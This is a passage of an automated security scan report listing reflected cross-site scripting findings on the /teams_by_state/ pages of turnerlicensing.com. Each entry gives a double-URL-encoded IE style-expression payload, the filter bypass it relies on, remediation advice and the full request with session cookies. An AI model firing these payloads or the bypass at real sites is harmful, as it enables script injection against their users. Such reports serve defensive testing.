GET /teams_by_state/Oklahoma?f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.222. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Oregon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3239c'style='x:expression(alert(1))'0a7c4969562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Oregon?3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.223. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Ottawa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 885e7'style='x:expression(alert(1))'749e6052f63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ottawa?885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.224. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Pennsylvania
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffcbc'style='x:expression(alert(1))'ef6395e1920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Pennsylvania?ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.225. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Rhode-Island
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84dc'style='x:expression(alert(1))'17befc6fc54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Rhode-Island?a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.226. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/South-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e79'style='x:expression(alert(1))'dc0d0d2a4ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Carolina?62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.227. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/South-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29abe'style='x:expression(alert(1))'456eef5a39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Dakota?29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.228. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Tennessee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a95b2'style='x:expression(alert(1))'349b7eab0ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Tennessee?a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.229. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Texas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e897'style='x:expression(alert(1))'fd511f150a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Texas?4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.230. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Toronto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3d65'style='x:expression(alert(1))'87f866157d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Toronto?f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.231. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Utah
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d76ae'style='x:expression(alert(1))'9da4365e664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Utah?d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.232. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Vancouver
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d512d'style='x:expression(alert(1))'0ec04acb8d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vancouver?d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.233. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Vermont
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72a41'style='x:expression(alert(1))'34af1748ca7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vermont?72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.234. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b052'style='x:expression(alert(1))'f30387b07b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Virginia?6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.235. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Washington
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa0b'style='x:expression(alert(1))'1b3031fc933 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Washington?6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.236. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Washington-D-C
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be7f'style='x:expression(alert(1))'e43a7f2732a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
